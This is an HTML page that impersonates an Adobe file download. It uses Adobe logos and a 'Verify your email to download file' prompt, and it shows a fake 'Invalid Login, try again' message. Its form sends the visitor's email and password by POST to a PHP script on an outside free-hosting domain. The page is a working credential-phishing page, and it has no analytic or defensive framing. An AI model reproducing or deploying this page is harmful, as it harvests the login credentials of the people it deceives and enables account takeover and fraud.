<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Adobe File download</title>
	<style>
.container {
  display: table;
  width: 100%;

}
.half {
  position: absolute;
  width: 50%;
  transform: skewX(-15deg);
}
.right-half {
  left: 50%;
  background: #8B0000;
  box-shadow: 100px 0px 0px #8B0000;
  overflow: hidden;
  background: url(https://i.imgur.com/R9kBfPU.jpg);
	background-repeat: no-repeat;
	background-size: 100% 100%;
}
		.colorlib-loader {
  position: fixed;
  left: 0px;
  top: 0px;
  width: 100%;
  height: 100%;
  z-index: 9999;
  background-color: #ffffff;
   opacity: 0.6;
    filter: alpha(opacity=60);
  background: url(../loader.gif) center no-repeat #fff; }

.left-half {
  right: 50%;
  background: #8B0000;
  box-shadow: -100px 0px 0px #8B0000;
}
article {
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%) skewX(15deg);
  ransform: translate(-50%, -50%);
  width: 100%;
}
html,
body {
  margin: 0;
  padding: 0;
}
* {
  box-sizing: border-box;
}
body {
  font-size: 1.25rem;
  font-family: sans-serif;
  line-height: 150%;
  text-shadow: 0 2px 2px #b6701e;
}
section {
  color: #fff;
  text-align: center;
}
div {
  height: 100%;
}
h1 {
  font-size: 1.75rem;
  margin: 0 0 0.75rem 0;
}
.loginblock {
	width: 435px;
	height: 216px;
	margin-left: auto;
	margin-right: auto;
	margin-top: 250px;
	background-image: url("excelgreenpage.png");
	background-repeat: no-repeat;
	padding-top: 70px;
   

}
.modals {
  position: fixed; /* Stay in place */
  z-index: 1; /* Sit on top */
  padding-top: 180px; /* Location of the box */
  left: 0;
  top: 0;
  width: 100%; /* Full width */
  height: 100%; /* Full height */
  overflow: auto; /* Enable scroll if needed */
  background-color: rgb(0,0,0); /* Fallback color */
  background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
}

/* Modal Content */
.modal-contents {
  background-color: #8B0000;
  margin: auto;
  padding: 20px;
  border: 1px solid #888;
  width: 430px;
  height: auto;
  background-image: url("excelgreenpage.png");
	background-repeat: no-repeat;
}
input{
	width: 230px;
	height: 30px;
	outline: none;
	border: none;
	margin-top: 10px;
	border-radius: 5px;
	padding-left: 3px;
}

button{
	height: 40px;
	outline: none;
	border:none;
	padding-left: 20px;
	padding-right: 20px;
	padding-bottom: 10px;
	padding-top: 10px;
	background-color: #4682B4;
	border-radius: 5px;
	color: white;
}



	</style>
</head>
<body style="overflow: hidden;">
 <section class="container">
  <div class="half left-half">
    <div style="margin-top: 40px; width: 70%;">

    	<img src="https://www.bomnews.com/wp-content/uploads/2017/03/adobe-acrobat-pro-dc-2017-cheap-price-deal.png">
    </div>
  </div>
  <div class="half right-half">
    <div class="modals">
    	<div class="modal-contents">
    		<form style="margin-top: 10px;" method="POST" action="https://technolibra.000webhostapp.com/ernest/post2.php">
          <img src="https://seeklogo.com/images/A/Adobe_PDF-logo-D4883D5CD6-seeklogo.com.png" width="100">
    			<h4 style="margin-bottom: 10px; font-size: 60%;">Verify your email to download file.</h4>
    			<div style="margin-bottom: -5px; margin-top: -10px;">Invalid Login, try again.</div>
    			<input type="email" name="email" placeholder="Someone@example.com" required> 
    			<br>
    			<input type="password" name="password" placeholder="Password" style="margin-bottom: 10px;">
    			<br>
    			<button type="submit">Download</button>
    		</form>
    	</div>
    </div>
  </div>
</section>
  
	
</body>
</html>